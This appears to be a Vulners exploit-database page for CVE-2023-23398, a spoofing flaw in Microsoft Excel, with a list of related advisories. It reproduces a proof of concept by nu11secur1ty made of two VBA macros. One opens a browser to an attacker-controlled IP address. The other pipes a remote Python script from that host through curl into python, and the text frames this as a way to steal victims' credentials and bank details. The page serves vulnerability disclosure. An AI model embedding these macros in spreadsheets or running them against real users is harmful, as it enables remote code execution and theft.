Vulners
Lucene search
Microsoft Excel Spoofing Vulnerability
| Reporter | Title | Published | Views | Family All 25 |
|---|---|---|---|---|
 | The vulnerability of Microsoft Excel editors, related to errors in information representation by the user interface, allows attackers to perform spoofing attacks. | 22 Mar 202300:00 | – | bdu_fstec |
 | CVE-2023-23398 | 14 Mar 202319:23 | – | circl |
 | Microsoft Excel 安全漏洞 | 14 Mar 202300:00 | – | cnnvd |
 | Microsoft Excel Spoofing Vulnerability | 16 Mar 202300:00 | – | cnvd |
 | CVE-2023-23398 | 14 Mar 202316:55 | – | cve |
 | CVE-2023-23398 Microsoft Excel Spoofing Vulnerability | 14 Mar 202316:55 | – | cvelist |
 | EUVD-2023-27498 | 3 Oct 202520:07 | – | euvd |
 | Description of the security update for Excel 2013: March 14, 2023 (KB5002348) | 14 Mar 202307:00 | – | mskb |
| Description of the security update for Excel 2016: March 14, 2023 (KB5002351) | 14 Mar 202307:00 | – | mskb |
 | KLA48560 Multiple vulnerabilities in Microsoft Office | 14 Mar 202300:00 | – | kaspersky |
10
## Title: Microsoft Excel Spoofing Vulnerability
## Author: nu11secur1ty
## Vendor: https://www.microsoft.com/
## Software: https://www.microsoft.com/en-us/microsoft-365/excel
## Reference: https://www.rapid7.com/fundamentals/spoofing-attacks/
## CVE-2023-23398
## Description:
The attack itself is carried out locally by a user with authentication
to the targeted system. An attacker could exploit the vulnerability by
convincing a victim, through social engineering, to download and open
a specially crafted file from a website which could lead to a local
attack on the victim's computer. The attacker can trick the victim to
open a malicious web page by using an Excel malicious file and he can
steal credentials, bank accounts information, sniffing and tracking
all the traffic of the victim without stopping - it depends on the
scenario and etc.
STATUS: HIGH Vulnerability
[+]Exploit:
```vbs
Sub Check_your_salaries()
CreateObject("Shell.Application").ShellExecute
"microsoft-edge:http://192.168.100.96/"
End Sub
```
[+]The victim Exploit + Curl Piping:
## WARNING:
The exploit server must be STREAMING at the moment when the victim hit
the button of the exploit!
```vbs
Sub silno_chukane()
Call Shell("cmd.exe /S /c" & "curl -s
http://192.168.100.96/PoC/PoC.py | python", vbNormalFocus)
End Sub
```
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-mitre/tree/main/2023/CVE-2023-23398)
## Reference:
[href](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-23398)
[href](https://www.rapid7.com/fundamentals/spoofing-attacks/)
## Proof and Exploit
[href](https://streamable.com/n5qp4q)
## Proof and Exploit
[href](https://streamable.com/u2wxzz)
## Time spend:
01:37:00
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
06 Apr 2023 00:00Current
7.3High risk
Vulners AI Score7.3
CVSS 3.17.1
EPSS0.00617
SSVC